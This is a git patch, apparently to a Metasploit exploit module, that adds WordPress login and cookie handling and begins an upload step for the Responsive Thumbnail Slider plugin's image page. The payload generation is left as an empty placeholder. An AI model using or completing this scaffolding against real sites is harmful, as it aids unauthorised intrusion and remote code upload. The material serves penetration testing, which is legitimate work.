From 8f89275df820c09798daf7f97f05458d4b31f4a3 Mon Sep 17 00:00:00 2001 From: Shelby Pace Date: Wed, 25 Jul 2018 14:22:24 -0500 Subject: [PATCH] authenticating to WordPress --- .../wp_responsive_thumbnail_slider_upload.rb | 59 ++++++++++++++++++- 1 file changed, 58 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb index edd34fcf98..2f736c8931 100644 --- a/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb +++ b/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb @@ -45,12 +45,69 @@ class MetasploitModule < Msf::Exploit::Remote end def check + # check for WordPress + # check if plugin is installed end # log into Wordpress # access 'manage images' page # upload file - def exploit + def login + wp_uri = normalize_uri(target_uri.path, 'wp-login.php') + res = send_request_cgi( + 'method' => 'GET', + 'uri' => wp_uri + ) + + if res && res.body.include?("WordPress") && res.body.include?("200") + print_status("WordPress accessed") + else + fail_with(Failure::NotFound, "Failed to access WordPress Login Page") + end + + redirect_uri = normalize_uri(target_uri.path, 'wp-admin/') + cookies = res.get_cookies + wp_login_res = send_request_cgi( + 'method' => 'POST', + 'uri' => wp_uri, + 'cookie' => cookies, + 'vars_post' => { + 'log' => datastore['USERNAME'], + 'pwd' => datastore['PASSWORD'], + 'wp-submit' => 'Log In', + 'redirect_to' => redirect_uri + } + ) + + auth_cookies = wp_login_res.get_cookies + auth_res = send_request_cgi( + 'method' => 'GET', + 'uri' => redirect_uri, + 'cookie' => auth_cookies + ) + + return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_res && auth_res.body.include?("wpadminbar") + + print_good("Logged into WordPress") + upload_payload(auth_cookies) end + def upload_payload(cookies) + # attempt to access plugins page + plugin_res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'wp-admin/', 'admin.php?page=responsive_thumbnail_slider_image_management'), + 'cookie' => cookies + ) + + unless plugin_res && plugin_res.body.include?("tmpl-uploader-window") + fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Plugin Page") + end + + # generate payload + end + + def exploit + login + end end